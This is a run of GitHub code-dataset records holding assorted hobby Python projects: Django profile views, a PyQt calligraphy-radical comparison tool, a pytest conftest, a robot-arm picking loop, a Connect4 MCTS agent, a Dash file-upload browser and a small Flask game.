tags with infusionsofts\n '''\n redirect = request.GET.get('next') if request.GET.get('next') else reverse_lazy(\"users:redirect\")\n\n profile = InfusionsoftProfile.objects.get_or_create(user=request.user)[0]\n profile.update_tags()\n\n return HttpResponseRedirect(redirect)\n\n@login_required\ndef update_user_profile(request):\n 
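    # get_or_create() returns an (instance, created) tuple; indexing [0] keeps
    # just the profile object, creating it on first access.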
user_profile = UserProfile.objects.get_or_create(user=request.user)[0]\n form = UserProfileForm(instance=user_profile)\n if request.method == 'POST':\n form = UserProfileForm(request.POST, instance=user_profile)\n if form.is_valid(): # was 'if form.is_valid:', which is always truthy and skips validation\n form.save()\n return HttpResponseRedirect(reverse_lazy(\"users:detail\", \n kwargs={\"pk\": request.user.pk}))\n context = {'form': form}\n return render_to_response(\"profiles/edit.html\", context, \n context_instance=RequestContext(request))\n\n\n@login_required\ndef update_user_private_profile(request):\n user_profile = UserPrivateProfile.objects.get_or_create(user=request.user)[0]\n form = UserPrivateProfileForm(instance=user_profile)\n if request.method == 'POST':\n form = UserPrivateProfileForm(request.POST, instance=user_profile)\n if form.is_valid(): # same fix as above: the method must be called\n form.save()\n return HttpResponseRedirect(reverse_lazy(\"users:detail\", \n kwargs={\"pk\": request.user.pk}))\n context = {'form': form}\n return render_to_response(\"profiles/edit.html\", context, \n context_instance=RequestContext(request))\n\n","repo_name":"WebPowerLabs/django-trainings","sub_path":"dtf/profiles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"20640080639","text":"import os\nimport sys\n\nimport cv2\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\n\nfrom radical_analysis_tool.radical_analysis_mainwindow import Ui_MainWindow\nfrom utils.Functions import creatBlankRGBImageWithSize, rgb2qimage, get_3_point_water_radical_img, drawline\n\n\nclass RadicalAnalysisGUI(QMainWindow, Ui_MainWindow):\n def __init__(self):\n super(RadicalAnalysisGUI, self).__init__()\n self.setupUi(self)\n\n self.open_pushButton.clicked.connect(self.handle_open_button)\n self.analyze_pushButton.clicked.connect(self.handle_analyze_button)\n self.a_listWidget.itemClicked.connect(self.handle_a_list_widgt_item_click)\n self.b_listWidget.itemClicked.connect(self.handle_b_list_widgt_item_click)\n\n self.merged_scene = QGraphicsScene()\n self.merged_scene.setBackgroundBrush(Qt.gray)\n self.merged_graphicsView.setScene(self.merged_scene)\n self.merged_scene.setSceneRect(QRectF())\n self.merged_graphicsView.fitInView(self.merged_scene.sceneRect(), Qt.KeepAspectRatio)\n\n self.a_scene = QGraphicsScene()\n self.a_scene.setBackgroundBrush(Qt.gray)\n self.a_graphicsView.setScene(self.a_scene)\n self.a_scene.setSceneRect(QRectF())\n self.a_graphicsView.fitInView(self.a_scene.sceneRect(), Qt.KeepAspectRatio)\n\n self.b_scene = QGraphicsScene()\n self.b_scene.setBackgroundBrush(Qt.gray)\n self.b_graphicsView.setScene(self.b_scene)\n self.b_scene.setSceneRect(QRectF())\n self.b_graphicsView.fitInView(self.b_scene.sceneRect(), Qt.KeepAspectRatio)\n\n\n self.image_path = \"\"\n\n self.a_image = None\n self.b_image = None\n\n\n def handle_open_button(self):\n print(\"open clicked\")\n self.image_path = str(QFileDialog.getExistingDirectory(self, \"Select Directory\"))\n\n image_names = [f for f in os.listdir(self.image_path) if \".png\" in f or \".jpg\" in f or \".jpeg\" in f]\n for i in range(len(image_names)):\n item_a = QListWidgetItem(image_names[i])\n self.a_listWidget.addItem(item_a)\n item_b = QListWidgetItem(image_names[i])\n self.b_listWidget.addItem(item_b)\n\n def handle_analyze_button(self):\n print(\"analyze clicked\")\n\n if self.a_image is None or self.b_image is None:\n print(\"a image or b image is none\")\n return\n\n a_radical = 
get_3_point_water_radical_img(self.a_image)\n b_radical = get_3_point_water_radical_img(self.b_image)\n\n if a_radical is None or b_radical is None:\n print(\"a or b radical is none\")\n return\n\n bk_rgb = creatBlankRGBImageWithSize(self.a_image.shape)\n\n # draw mizi grid\n drawline(bk_rgb, (0,0), (bk_rgb.shape[0]-1, bk_rgb.shape[1]-1), (0, 0, 255), 1, gap=4)\n drawline(bk_rgb, (0, bk_rgb.shape[1] - 1), (bk_rgb.shape[0] - 1, 0), (0, 0, 255), 1, gap=4)\n drawline(bk_rgb, (0, int(bk_rgb.shape[1]/2)), (bk_rgb.shape[0]-1, int(bk_rgb.shape[1]/2)), (0, 0, 255), 1, gap=4)\n drawline(bk_rgb, (int(bk_rgb.shape[0]/2), 0), (int(bk_rgb.shape[0]/2), bk_rgb.shape[1] - 1), (0, 0, 255), 1, gap=4)\n\n\n for x in range(self.a_image.shape[0]):\n for y in range(self.a_image.shape[1]):\n if a_radical[x][y] == 0 and b_radical[x][y] == 0:\n bk_rgb[x][y] = (0, 0, 0) # black\n if a_radical[x][y] == 0 and b_radical[x][y] != 0:\n bk_rgb[x][y] = (0, 0, 255) # red\n if a_radical[x][y] != 0 and b_radical[x][y] == 0:\n bk_rgb[x][y] = (0, 255, 0) # green\n\n qimg = rgb2qimage(bk_rgb)\n qimg_pix = QPixmap.fromImage(qimg)\n\n self.merged_scene.addPixmap(qimg_pix)\n self.merged_scene.setSceneRect(QRectF())\n self.merged_graphicsView.fitInView(self.merged_scene.sceneRect(), Qt.KeepAspectRatio)\n self.merged_scene.update()\n\n def handle_a_list_widgt_item_click(self, item):\n print(\"item b clicked\")\n img_name = item.text().strip()\n img_path = os.path.join(self.image_path, img_name)\n if not os.path.exists(img_path):\n print(\"not a image found!\")\n return\n\n self.a_image = cv2.imread(img_path, 0)\n\n a_qimg = QImage(img_path)\n a_qimg_pix = QPixmap.fromImage(a_qimg)\n # self.a_scene.addPixmap(a_qimg_pix)\n self.a_scene.addPixmap(a_qimg_pix)\n self.a_scene.setSceneRect(QRectF())\n self.a_graphicsView.fitInView(self.a_scene.sceneRect(), Qt.KeepAspectRatio)\n self.a_scene.update()\n\n def handle_b_list_widgt_item_click(self, item):\n print(\"item b clicked\")\n img_name = item.text().strip()\n img_path = os.path.join(self.image_path, img_name)\n if not os.path.exists(img_path):\n print(\"not a image found!\")\n return\n\n self.b_image = cv2.imread(img_path, 0)\n\n b_qimg = QImage(img_path)\n b_qimg_pix = QPixmap.fromImage(b_qimg)\n # self.b_scene.addPixmap(b_qimg_pix)\n self.b_scene.addPixmap(b_qimg_pix)\n self.b_scene.setSceneRect(QRectF())\n self.b_graphicsView.fitInView(self.b_scene.sceneRect(), Qt.KeepAspectRatio)\n self.b_scene.update()\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n MainWindow = RadicalAnalysisGUI()\n MainWindow.show()\n sys.exit(app.exec_())\n\n\n\n\n\n # img_path = \"./temp/瀛.png\"\n #\n # threshold = 1. 
/ 4\n #\n # img = cv2.imread(img_path, 0)\n #\n # bk = get_3_point_water_radical_img(img)\n #\n # # rects = getAllMiniBoundingBoxesOfImage(img)\n # # print(len(rects))\n #\n # # cv2.line(img, (int(threshold*img.shape[0]), 0), (int(threshold*img.shape[0]), img.shape[1]), 0, 2 )\n # #\n # # for rect in rects:\n # # cent_x = rect[0] + int(rect[2] / 2)\n # #\n # # if cent_x <= threshold * img.shape[1]:\n # # cv2.rectangle(img, (rect[0], rect[1]), (rect[0]+rect[2], rect[1]+rect[3]), 0, 2)\n #\n #\n #\n #\n # cv2.imshow(\"1\", bk)\n #\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()","repo_name":"plateaukao/CSInTraditionalChineseCalligraphy","sub_path":"radical_analysis_tool/radical_analysis_gui.py","file_name":"radical_analysis_gui.py","file_ext":"py","file_size_in_byte":6120,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"8589181924","text":"\"\"\"\nin order to share your fixtures across your entire module, py.test \nsuggests you define all your fixtures within one single conftest.py file.\n~ https://gist.github.com/peterhurford/09f7dcda0ab04b95c026c60fa49c2a68\n\nAdditionally, they do not need to be imported in tests that depend on them.\nJust use by name.\n\"\"\"\nimport logging\n\nimport pytest\nfrom grapl_tests_common.clients.grapl_web_client import GraplWebClient\n\n\n@pytest.fixture(\n # Reuse the same actix session for the entire test run session.\n # (yes, two unrelated uses of 'session')\n scope=\"session\"\n)\ndef actix_session() -> str:\n return GraplWebClient().get_actix_session()\n\n\n# Applies it to every test function automatically.\n@pytest.fixture(scope=\"function\", autouse=True)\ndef set_noisy_loggers_to_log_level_info(caplog: pytest.LogCaptureFixture) -> None:\n # We globally declare every logger should use DEBUG in `exec_pytest`,\n # and here we piecemeal set some of the less useful loggers to a\n # different level.\n\n # Ideally we'd be able to do this with a regex or something - I've opened a\n # discussion here: https://github.com/pytest-dev/pytest/discussions/8925\n logger_names = (\n \"botocore.auth\",\n \"botocore.endpoint\",\n \"botocore.hooks\",\n \"botocore.loaders\",\n \"botocore.parsers\",\n \"botocore.retryhandler\",\n \"urllib3.connectionpool\",\n )\n for logger_name in logger_names:\n caplog.set_level(logging.INFO, logger=logger_name)\n","repo_name":"macasieb/grapl","sub_path":"src/python/e2e-test-runner/e2e_test_runner/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"7810703996","text":"# import the necessary packages\nprint(\"beginning execution\")\nimport grip\nimport time\nimport cv2 as cv\nimport pyrealsense2 as rs\nimport numpy as np\nimport altusi.visualizer as vis\nimport robot\nimport ikpy\nprint(\"libraries imported\")\n\ngp = grip.GripPipeline()\nprint(\"grip instantiated\")\n\nSEARCH_LR = 0\nALIGN_UD = 1\nIK = 2\nGRAB = 3\nHOME = 4\n\nstage = 0\ntracking = 0\n\nmy_chain = ikpy.chain.Chain.from_urdf_file(\"./niryo_one.urdf\")\n\n#object_detector = ObjectDetector()\n\nhome_pin = 13 #GPIO pin connected to set home switch\ndelay = 1.2 # seconds\nangle = 2 #degrees\n\nxlen = 640\nylen = 480\n\nx_center = xlen / 2\ny_center = ylen / 2\n\nx_range_low = x_center - 20\nx_range_high = x_center + 20\ny_range_low = y_center - 20\ny_range_high = y_center + 20\n\n# initialize the camera and grab a reference to the raw camera capture\nprint(\"loading camera\")\npipeline = 
rs.pipeline()\nconfig = rs.config()\nconfig.enable_stream(rs.stream.depth, xlen, ylen, rs.format.z16, 30)\nconfig.enable_stream(rs.stream.color, xlen, ylen, rs.format.bgr8, 30)\npipeline.start(config)\nprint(\"camera loaded\")\n\n# allow the camera to warmup\ntime.sleep(0.1)\n\n#instantiate robot\nprint(\"instantiating robot\")\nmy_robot = robot.Robot()\nmy_robot.goReady()\nprint(\"robot went home\")\n\n#call back function for GPIO interrupt\ndef home_pressed(channel):\n print(\"HOME PRESSED\")\n my_robot.resetHome()\n \n\n# capture frames from the camera\n_start_t = time.time()\nstart_time = 0\nwhile True:\n _prx_t = time.time() - _start_t\n _start_t = time.time()\n frames = pipeline.wait_for_frames()\n color_frame = frames.get_color_frame()\n depth_frame = frames.get_depth_frame()\n frm = np.asanyarray(color_frame.get_data())\n _start_t = time.time()\n time.sleep(0.01)\n gp.process(frm)\n bboxes = gp.filter_contours_output\n #scores, bboxes = object_detector.getObjects(frm, def_score=0.4)\n \n\n \n if len(bboxes) > 0 and (time.time() - start_time) > delay:\n tracking = 1\n target = bboxes[0]\n x1, y1, w, h = target\n \n x2 = x1 + w\n y2 = y1 + h\n \n w = x2 - x1\n h = y2 - y1\n \n xmid = int((x1 + x2) /2)\n ymid = int((y1 + y2) /2)\n \n z = depth_frame.get_distance(xmid, ymid)\n increment = 5 \n \n if stage == SEARCH_LR:\n if (xmid < x_range_low):\n print(\"move LEFT\")\n my_robot.moveLR(increment)\n\n my_robot.writeJSON()\n elif (xmid > x_range_high):\n print(\"move RIGHT\")\n my_robot.moveLR(-1 * increment)\n my_robot.writeJSON()\n else:\n print(\"DO NOT MOVE, in the middle X\")\n stage = ALIGN_UD\n continue\n if stage == ALIGN_UD:\n if (ymid < y_range_low):\n print(\"move UP\")\n my_robot.moveUD(increment)\n my_robot.writeJSON()\n elif (ymid > y_range_high):\n print(\"move DOWN\")\n my_robot.moveUD(-1 * increment)\n my_robot.writeJSON()\n else:\n print(\"DO NOT MOVE, in the middle Y\")\n stage = IK\n continue\n if stage == IK:\n pose = my_robot.current_pose[:8]\n pose[1] = 0\n pose[4] = 0\n pose[6] = 0\n pose[7] = 0\n current_position_frame = my_chain.forward_kinematics(pose)\n cyl_x = current_position_frame[:3,3][0] # was 'real_frame', which is never defined and would raise NameError\n cyl_z = current_position_frame[:3,3][2]\n\n \n target_vector = [cyl_x + z ,0, cyl_z]\n target_frame = np.eye(4)\n target_frame[:3, 3] = target_vector\n target_angles = my_chain.inverse_kinematics(target_frame)\n target_pose = [my_robot.current_pose[1],target_angles[2],target_angles[3],0,target_angles[5],0,45]\n my_robot.setPose(target_pose)\n time.sleep(4)\n stage = GRAB\n continue\n if stage == GRAB:\n my_robot.moveGrab(-30)\n time.sleep(2)\n stage = HOME\n continue\n if stage == HOME:\n my_robot.goReady()\n time.sleep(4)\n stage = SEARCH_LR\n tracking = 0\n continue\n \n start_time = time.time()\n \n elif (len(bboxes) == 0) and (time.time() - start_time) > delay:\n tracking = 0\n stage = SEARCH_LR\n #go home call\n my_robot.goReady()\n print(\"go home, can't see anything\")\n start_time = time.time()\n \n if len(bboxes):\n frm = vis.plotBBoxes(frm, [(x,y,x+w,y+h) for x,y,w,h in bboxes], len(bboxes) * ['strawberry'], len(bboxes)*[0])\n frm = vis.plotInfo(frm, 'Raspberry Pi - FPS: {:.3f}'.format(1/_prx_t))\n frm = cv.cvtColor(np.asarray(frm), cv.COLOR_BGR2RGB)\n\n # show the frame\n cv.imshow(\"Frame\", frm)\n cv.imwrite(\"../Frontend/frame.jpg\", frm)\n \n key = cv.waitKey(1)\n if key in [27, ord('q')]:\n break\n #time.sleep(2)\n 
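# Added note: wrapping the loop above in try/finally would guarantee the pipeline cleanup below runs even if the loop raises.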
\npipeline.stop()\n","repo_name":"darisoy/RobotArm","sub_path":"pi-dyna-test-env/gripRunner.py","file_name":"gripRunner.py","file_ext":"py","file_size_in_byte":5033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"42018844884","text":"import numpy as np\n\nfrom MCTSAgent.Edge import Edge\nfrom MCTSAgent.Node import Node\nfrom connect4.Game import GameState, GRID_SHAPE\n\nEPSILON = 0.2\nALPHA = 0.8\n\n\ndef computeU(N, P, epsilon, nu, action, sumN):\n U = ((1 - epsilon) * P + epsilon * nu[action]) * np.sqrt(sumN) / (1 + N)\n return U\n\n\nclass MCTS():\n\n def __init__(self, root, cpuct, model, debug=False):\n self.root = root\n # self.nodes_dict is not reset when we change the root of the tree, in order to be able to recover\n # already computed nodes, if the new tree extends to these nodes\n self.nodes_dict = {}\n # As per the cheatsheet: during the selection phase of the MCTS, the tree starts from the root\n # and chooses the node which has the maximum value for Q+U, until it reaches a leaf.\n # Q is equal to the mean value of the next state. At the beginning, Q is totally wrong, but after\n # some time, it becomes more and more accurate.\n # U is a function of P (prior proba of selecting the move) and N (number of visits), that increases\n # if the move has not been explored much (ie. if N is small compared to the N of the other moves),\n # or if the prior probability of the action is high. It is also mitigated by cpuct: U = cpuct * function(P, N)\n # Therefore, if cpuct is high, U will keep on being more important than Q, even during the latest\n # stages, and exploration will keep on being favored, rather than exploitation of Q\n self.cpuct = cpuct\n # Model used to evaluate the leaves, each time the selection phase reaches a leaf of the tree.\n # It can be whatever we want: something totally random, a neural network...\n # It just must contain a method predict(self, board) which predicts V (value of the board)\n # and P (probabilities of the actions in this board state)\n self.model = model\n self.debug = debug\n self.addNode(root)\n\n def simulate(self):\n \"\"\"Main function of the MCTS: does one simulation, ie. 
evaluates and expands the most promising leaf of the tree\n - selection: choses the most promising leaf (step 1 of the cheat sheet)\n - evaluate it: evaluates the allowed actions from this leaf, appends the corresponding nodes to the tree (step 2)\n - backfill the tree with the value of the leaf (step 3)\n \"\"\"\n\n if self.debug:\n state = GameState.from_id(self.root.state_id, GRID_SHAPE)\n print('ROOT NODE...%s', self.root.state_id)\n print(state)\n print('CURRENT PLAYER...%d', state.currentPlayer)\n\n ##### MOVE THE LEAF NODE\n ## YOUR CODE HERE: move to a leaf (call one of the functions below)\n leaf, value, done, breadcrumbs = self.moveToLeaf()\n if self.debug:\n state = GameState.from_id(leaf.state_id, GRID_SHAPE)\n print(state)\n\n ##### EXPAND THE LEAF NODE\n ## YOUR CODE HERE: expand the leaf (call one of the functions below)\n self.expandLeaf(leaf, done)\n\n ##### BACKFILL THE VALUE THROUGH THE TREE\n ## YOUR CODE HERE: backfill the value (call one of the functions below)\n self.backFill(leaf, value, breadcrumbs)\n\n def moveToLeaf(self):\n \"\"\"Goes down the tree until reaches the 'most promising leaf'\"\"\"\n\n if self.debug:\n print('------MOVING TO LEAF------')\n\n # list of the edges from the root to the leaf\n breadcrumbs = []\n currentNode = self.root\n\n done = False\n value = 0\n\n while not currentNode.isLeaf():\n\n if currentNode == self.root:\n epsilon = EPSILON\n nu = np.random.dirichlet([ALPHA] * len(currentNode.edges))\n else:\n epsilon = 0\n nu = [0] * len(currentNode.edges)\n ## YOUR CODE HERE: find the best next node, ie. the one which edge has the biggest Q + U\n ## Hint: each edge of the current node has Q = edge.stats['Q'], P = edge.stats['P'] and N = edge.stats['N']\n ## => you have to find the edge which maximizes Q+U, because that one is pointing out to the best next node\n ## NB: currentNode.edges returns a list of (action, edge), you have to iterate over that list\n ## For each edge: Q is directly found above, U is more complex, you have to compute it\n ## 1) see the comment in __init__(): U = self.cpuct * function(P, N)\n ## 2) basically, function(P, N) = P * sqrt(sum(N)) / (1+N), but we add\n ## randomness at the root node, so function(P, N) becomes:\n ## ((1-epsilon) * P + epsilon * nu[action]) * sqrt(sum(N)) / (1+N), where sum(N) is the sum of N of the edges of currentNode\n\n sumN = 0\n\n for action, edge in currentNode.edges:\n sumN += edge.stats['N']\n\n maxQU = -1\n for idx, (action, edge) in enumerate(currentNode.edges):\n Q = edge.stats['Q']\n P = edge.stats['P']\n N = edge.stats['N']\n U = computeU(N, P, epsilon, nu, idx, sumN)\n if Q + U > maxQU:\n maxQU = Q + U\n bestEdge = edge\n\n # At the very beginning, the tree is a single node, ie. a single leaf, and we don't enter into\n # this loop. Therefore, in that case, currentNode keeps on being the root node, value, done\n # keep the values they have before the loop (ie. 
0 and False), and breadcrumbs keeps on being empty\n state = GameState.from_id(currentNode.state_id, GRID_SHAPE)\n # YOUR CODE HERE: run the action corresponding to the best edge\n _, value, done = state.takeAction(bestEdge.action)\n\n ## YOUR CODE HERE: append the selected edge to breadcrumbs\n breadcrumbs.append(bestEdge)\n ## YOUR CODE HERE: the outNode of the selected edge\n currentNode = bestEdge.outNode\n\n return currentNode, value, done, breadcrumbs\n\n def expandLeaf(self, leaf, done):\n\n if self.debug:\n print('------EVALUATING LEAF------')\n\n if not done:\n\n state = GameState.from_id(leaf.state_id, GRID_SHAPE)\n current_proba_victory, action_scores, allowedActions = self.evaluate_action_scores_from_model(state)\n if self.debug:\n print('CURRENT PROBA VICTORY FOR %d: %f', state.currentPlayer, current_proba_victory)\n\n ## YOUR CODE HERE: for all the actions allowed in allowedActions:\n ## - execute the action, which leads to a new state 'newState'.\n ## If the node corresponding to 'newState' is not in nodes_dict, append it using the function self.addNode(node)\n ## Else fetch it from nodes_dict\n ## Then create the Edge linking leaf to that node, with prior = action_scores[action], and add it to leaf.edges\n ## (which is the list of the edges of leaf)\n\n for action in range(len(allowedActions)):\n if allowedActions[action]:\n newState = state.takeAction(action)[0]\n node = Node(newState)\n if node in self.nodes_dict:\n node = self.nodes_dict[node.state_id]\n else:\n self.addNode(node)\n\n leaf.edges.append((action, Edge(leaf, node, action_scores[action], action)))\n\n def evaluate_action_scores_from_model(self, state):\n # state.board has shape (6,7), so it can be considered as a 1-layer image of shape:\n # - either (1,6,7) if channel layer first\n # - or (6,7,1) if channel last as usually done with Keras\n # Plus Keras needs a batch of inputs => we add an additional encapsulating array\n # => resulting shape is (1,1,6,7)\n inputToModel = np.array([[state.get_board_for_neural_network()]], dtype=np.int8)\n\n ## YOUR CODE HERE: let self.model do its predictions\n preds = self.model.predict(inputToModel)\n # preds[0] is an array of shape (1,1): the input was a batch of 1 board, and the neural network\n # predicts one value per board, between -1 and 1 because of the tanh activation for this head\n current_proba_victory = preds[0][0, 0]\n # preds[1] is an array of shape (1,7): the input was a batch of 1 board, and the neural network\n # predicts 7 values per board (the values for each possible action - more precisely a linear value\n # before transformation to a percentage via the softmax)\n logits = preds[1][0]\n\n # Forbidden actions must receive a probability equal to 0, therefore we force the output of the\n # neural network to -100 for them (so that the softmax would transform them to 0)\n allowedActions = state.allowedActions()\n forbiddenActions = [not (isallowed) for isallowed in allowedActions]\n logits[forbiddenActions] = -100\n\n # SOFTMAX\n odds = np.exp(logits)\n action_scores = odds / np.sum(odds)\n\n return ((current_proba_victory, action_scores, allowedActions))\n\n def backFill(self, leaf, value, breadcrumbs):\n \"\"\"breadcrumbs contains the list of edges which led from the root node to the leaf.\n In this function, we iterate over that list, in oder to increment N (number of visits)\n of these edges, and also in order to update their W (total value of the next state)\n and their Q = W / N\n \"\"\"\n\n ## Warning: there is a tricky trap with W: we want to add 
value or -value, depending on the\n ## player of the edge.\n ## Explanation:\n ## Let's say that the player at the leaf is 'leafPlayer': 'value' contains the value of the\n ## leaf according to 'leafPlayer'\n ## => during the iteration over the edges contained into breadcrumbs:\n ## - if the player of edge.inNode is equal to 'leafPlayer': W = W + value\n ##\t\t- else: W = W - value\n\n if self.debug:\n print('------DOING BACKFILL------')\n\n leafPlayer = GameState.current_player_from_id(leaf.state_id)\n\n ## YOUR CODE HERE:\n ## for each edge of breadcrumbs:\n ## - N is equal to edge.stats['N']. Increment it.\n ## - W is equal to edge.stats['W']. Add value or -value, as per the warning above.\n ## You can get the player of edge.inNode with GameState.current_player_from_id(edge.inNode.state_id)\n ## - update edge.stats['Q'], as per the formula Q = W / N\n\n for edge in breadcrumbs:\n edge.stats['N'] += 1\n if leafPlayer == GameState.current_player_from_id(edge.inNode.state_id):\n edge.stats['W'] += value\n else:\n edge.stats['W'] -= value\n edge.stats['Q'] = edge.stats['W'] / edge.stats['N']\n\n def addNode(self, node):\n self.nodes_dict[node.state_id] = node\n","repo_name":"ZaChr0me/MLUI","sub_path":"PluginSource/python/MCTSAgent/MCTS.py","file_name":"MCTS.py","file_ext":"py","file_size_in_byte":10945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74134987345","text":"import base64\r\nimport os\r\nfrom urllib.parse import quote as urlquote\r\nimport sys\r\n\r\nfrom whoosh.index import create_in\r\nfrom whoosh.fields import Schema, TEXT, ID\r\n\r\nfrom whoosh.qparser import QueryParser\r\nfrom whoosh import scoring\r\nfrom whoosh.index import open_dir\r\n\r\nfrom flask import Flask, send_from_directory\r\nimport dash\r\nimport dash_core_components as dcc\r\nimport dash_html_components as html\r\nfrom dash.dependencies import Input, Output\r\n\r\n\r\nUPLOAD_DIRECTORY = os.getcwd()+\"//upload\"\r\n\r\nALLOWED_EXTENSIONS = {'txt', 'pdf', 'doc','docx'}\r\n\r\ndef allowed_file(filename):\r\n return '.' in filename and \\\r\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\r\n\r\nif not os.path.exists(UPLOAD_DIRECTORY):\r\n os.makedirs(UPLOAD_DIRECTORY)\r\n\r\n\r\n# Normally, Dash creates its own Flask server internally. 
By creating our own,\r\n# we can create a route for downloading files directly:\r\nserver = Flask(__name__)\r\napp = dash.Dash(server=server)\r\n\r\n\r\n@server.route(\"/download/\")\r\ndef download(path):\r\n \"\"\"Serve a file from the upload directory.\"\"\"\r\n return send_from_directory(UPLOAD_DIRECTORY, path, as_attachment=True)\r\n\r\n\r\napp.layout = html.Div(\r\n [\r\n html.H1(\"File Browser\"),\r\n html.H2(\"Upload\"),\r\n dcc.Upload(\r\n id=\"upload-data\",\r\n children=html.Div(\r\n [\"Drag and drop or click to select a file to upload.\"]\r\n ),\r\n style={\r\n \"width\": \"100%\",\r\n \"height\": \"60px\",\r\n \"lineHeight\": \"60px\",\r\n \"borderWidth\": \"1px\",\r\n \"borderStyle\": \"dashed\",\r\n \"borderRadius\": \"5px\",\r\n \"textAlign\": \"center\",\r\n \"margin\": \"10px\",\r\n },\r\n multiple=True,\r\n ),\r\n dcc.Input(id = \"input1\",type=\"text\", placeholder=\"enter a search term\"),\r\n html.Div(id=\"output\"),\r\n html.H2(\"File List\"),\r\n html.Ul(id=\"file-list\"),\r\n\r\n ],\r\n style={\"max-width\": \"500px\"},\r\n)\r\n\r\n\r\ndef save_file(name, content):\r\n \"\"\"Decode and store a file uploaded with Plotly Dash.\"\"\"\r\n data = content.encode(\"utf8\").split(b\";base64,\")[1]\r\n with open(os.path.join(UPLOAD_DIRECTORY, name), \"wb\") as fp:\r\n fp.write(base64.decodebytes(data))\r\n\r\ndef uploaded_files():\r\n \"\"\"List the files in the upload directory.\"\"\"\r\n files = []\r\n for filename in os.listdir(UPLOAD_DIRECTORY):\r\n path = os.path.join(UPLOAD_DIRECTORY, filename)\r\n if os.path.isfile(path):\r\n files.append(filename)\r\n return files\r\n\r\n\r\ndef file_download_link(filename):\r\n \"\"\"Create a Plotly Dash 'A' element that downloads a file from the app.\"\"\"\r\n location = \"/download/{}\".format(urlquote(filename))\r\n return html.A(filename, href=location)\r\n\r\n\r\ndef createSearchableData(root):\r\n schema = Schema(title=TEXT(stored=True),path=ID(stored=True),content=TEXT,textdata=TEXT(stored=True))\r\n if not os.path.exists(\"indexdir\"):\r\n os.mkdir(\"indexdir\")\r\n ix = create_in(\"indexdir\",schema)\r\n writer = ix.writer()\r\n filepaths = [os.path.join(root,i) for i in os.listdir(root)]\r\n for path in filepaths:\r\n fp = open(path,'r')\r\n print(path)\r\n text = fp.read()\r\n writer.add_document(title=path.split(\"\\\\\")[1], path=path,\\\r\n content=text,textdata=text)\r\n fp.close()\r\n writer.commit()\r\n\r\ndef create_index(root):\r\n createSearchableData(root)\r\n\r\ndef whoosh_search(root,topn,x):\r\n ix = open_dir(\"indexdir\")\r\n query_str = x\r\n topN =topn\r\n with ix.searcher(weighting=scoring.Frequency) as searcher:\r\n query = QueryParser(\"content\", ix.schema).parse(query_str)\r\n results = searcher.search(query,limit=topN)\r\n return(results)\r\n\r\n\r\n@app.callback(\r\n Output(\"file-list\", \"children\"),\r\n [Input(\"upload-data\", \"filename\"),Input(\"upload-data\", \"contents\")],\r\n)\r\ndef update_output(uploaded_filenames, uploaded_file_contents):\r\n \"\"\"Save uploaded files and regenerate the file list.\"\"\"\r\n\r\n if uploaded_filenames is not None and uploaded_file_contents is not None:\r\n for name, data in zip(uploaded_filenames, uploaded_file_contents):\r\n save_file(name, data)\r\n\r\n files = uploaded_files()\r\n if len(files) == 0:\r\n return [html.Li(\"No files yet!\")]\r\n else:\r\n return [html.Li(file_download_link(filename)) for filename in files]\r\n\r\n\r\n@app.callback(\r\n Output(\"output\", \"children\"),\r\n [Input(\"input1\", \"value\")],\r\n)\r\ndef 
show_text(input1):\r\n return u'Input 1 is {}'.format(input1)\r\n\r\nif __name__ == \"__main__\":\r\n app.run_server(debug=True, port=8888)","repo_name":"forsc/apprep_1","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"28268654410","text":"from flask import Flask,render_template, request, redirect, url_for\n\napp = Flask(__name__)\n\nclass Numbers:\n def __init__(self, first, second, third):\n self.first = first\n self.second = second\n self.third = third\n\n@app.route('/start', methods=['GET','POST'])\ndef wait():\n if request.method == 'GET':\n return render_template('wait.html')\n else:\n my_numbers = Numbers(\n request.form.get('my_first'),\n request.form.get('my_second'),\n request.form.get('my_third'),\n )\n # Instead of a plain NO, show a warning on the wait page that the same value was entered more than once\n if my_numbers.first == my_numbers.second:\n return render_template('wait.html',change=1)\n elif my_numbers.second == my_numbers.third:\n return render_template('wait.html',change=1)\n elif my_numbers.first == my_numbers.third:\n return render_template('wait.html',change=1)\n else:\n return render_template('wait.html',change=2, numbers=my_numbers)\n\n\n@app.route('/play', methods=['GET'])\ndef play():\n if request.method == 'GET':\n return render_template('play.html')\n else:\n pass\n\n\n# @app.route('/judge')\n# def judge():\n# pass\n\n\n@app.errorhandler(404)\ndef page_not_found(error):\n return render_template('title.html'), 404\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"ginpoko/numeron_flask","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"14912594509","text":"import random\nimport pygame\nfrom constantes import *\nfrom master_enemigo import Enemigo_master\nfrom auxiliar import *\n\nclass Enemigo_walker(Enemigo_master):\n '''\n This class creates the enemy that walks from right to left and left to right. 
